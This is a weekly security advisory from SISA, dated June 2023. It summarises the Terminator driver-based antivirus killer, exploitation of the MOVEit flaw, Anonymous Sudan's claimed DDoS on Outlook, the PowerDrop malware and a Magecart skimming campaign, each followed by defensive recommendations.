Anonymous Sudan claims DDoS attacks on MS Outlook

SISA Weekly Threat Watch - 12 June 2023

With malicious actors constantly evolving their tactics to conceal their activities and make detection more challenging, ongoing vigilance and proactive security practices are vital to safeguard sensitive data from such threats. Over the last week, several new threat groups were involved in targeted campaigns, employing BYOVD (Bring Your Own Vulnerable Driver) attack tactics, web skimming, DDoS (distributed denial of service) attacks and PowerShell scripts.

SISA Weekly Threat Watch – our weekly feature brings to you a quick snapshot of all the major security vulnerabilities that posed a threat to organizations worldwide. These recurring actionable threat advisories will also provide information and recommendations that will help security teams take appropriate actions to defend against the latest and critical threats.

1. Terminator antivirus killer: A vulnerable Windows driver in disguise

Security researchers have discovered that the Terminator antivirus killer promoted by the threat actor Spyboy has been used to enable BYOVD attacks. It is claimed that Terminator is allegedly capable of bypassing 24 different antivirus (AV), Endpoint Detection and Response (EDR), and Extended Detection and Response (XDR) security solutions, including Windows Defender, on devices running Windows 7 and later.

Termintor aids the deployment of a legitimate Zemana anti-malware kernel driver “zamguard64.sys” or “zam64.sys” under a random name to the System32 folder, with the malicious driver then used to end antivirus and endpoint detection and response software’s user-mode processes. It is recommended to practice strong Windows security roles hygiene, keep track of the drivers installed on systems, and implement the driver blocklist feature in Windows to block malicious drivers to safeguard against such types of attacks.

2. MOVEit Transfer vulnerability actively exploited

A widely recognized ransomware group has been linked to the recent zero-day attack on MOVEit, exploiting the vulnerability to illicitly obtain data from multiple organizations. CVE-2023-34362 refers to a SQL injection vulnerability present in the web application of MOVEit Transfer. Exploitation of this vulnerability can be carried out remotely by an unauthenticated attacker through a specially crafted request directed at a vulnerable instance of MOVEit Transfer. Notably, both the on-premises version of MOVEit Transfer and MOVEit Cloud were affected by this vulnerability.

Recent activities have been connected to a newly identified threat cluster named UNC4857. Researchers have identified the webshell utilized in the attack as LemurLoot. Observations indicate that victims located in the United States, Canada, and India experienced instances of data theft shortly after the deployment of the webshell. Users are recommended to disable all HTTP and HTTPS traffic to the MOVEit Transfer environment, review files and user accounts for unauthorized entries, install the fixed version of the software, and implement continuous monitoring practices to detect potential security threats and suspicious activities.

3. hit by outages as Anonymous Sudan claims DDoS attacks

Microsoft Outlook was down for thousands of American users on 6th June 2023 after hacktivist group Anonymous Sudan claims to have started a new campaign dedicated to targeting US companies and infrastructure. The outages created widespread disruptions for global Outlook users, preventing users worldwide from reliably accessing or sending email and using the mobile Outlook app.

Microsoft said that these outages were caused by a technical issue, switching their updates between saying they mitigated the issues and that the problem is happening again. While Microsoft claims technical issues caused the outages, Anonymous Sudan is claiming to be behind them, warning that they are performing DDoS attacks on Microsoft to protest the US getting involved in Sudanese internal affairs. To protect data from being compromised, organizations are recommended to enroll in a DDoS (Cloud) Mitigation protection service, identify critical assets, understand how users connect to the corporate networks, and ensure no security fixes are missing. As a redundancy measure, it is also advised to have a second ISP connection that can handle the traffic.

4. PowerDrop: A new insidious PowerShell Script targets U.S. aerospace defense industry

Security researchers recently discovered a new malware named PowerDrop, attributed to an unidentified threat actor, designed to target the aerospace industry in the U.S. This malware, based on PowerShell, employs sophisticated tactics such as deception, encoding, and encryption to avoid detection. It is a PowerShell command that is executed by the WWMI (Windows Management Instrumentation) service.

The malware operates by sending Internet Control Message Protocol (ICMP) echo request messages, serving as a trigger for its C2 functionality. The malware’s primary objective is to execute remote commands on targeted networks after successfully infiltrating, executing, and maintaining persistence within servers. The malware’s operation tactics stand between “off-the-shelf” malware and advanced APT techniques, while the timing and targets suggest that the aggressor is likely state sponsored. It is recommended to conduct vulnerability scans on Windows systems and remain vigilant for any unusual pinging activity originating from the networks toward external sources to avoid being a victim of such attacks.

5. New Magecart-style campaign abusing legitimate websites to attack others

Researchers have discovered a new on-going Magecart-style web skimmer campaign, designed to steal personally identifiable information (PII) and credit card information from digital commerce websites. The initial step of the current attack campaign is to identify vulnerable legitimate sites and hack them to host their malicious code, using them as C2 servers for their attacks. By distributing credit card skimmers using legitimate websites with a good reputation, the threat actors evade detection and blocks and are freed from needing to set up their own infrastructure.

Thereafter, the attackers move to inject a small JavaScript snippet into the target commerce sites that fetches the malicious code from the websites compromised previously. After the skimmers steal the customers’ details, the data is set to the attacker’s server via an HTTP request created as an IMG tag within the skimmer. To prevent this initial access to the server, it is advised to keep up with the most recent patches and complement them by implementing WAF (Web Application Firewalls). Website owners can defend against Magecart infections by appropriately protecting website admin accounts and applying security updates for their CMS and plugins.

To get daily updates on the critical vulnerabilities being exploited by threat actors, subscribe to SISA Daily Threat Watch – our daily actionable threat advisories.

For a deeper understanding of how you can prevent these threats from affecting your organization, request a call to get in touch with our experts.

SISA’s Latest
close slider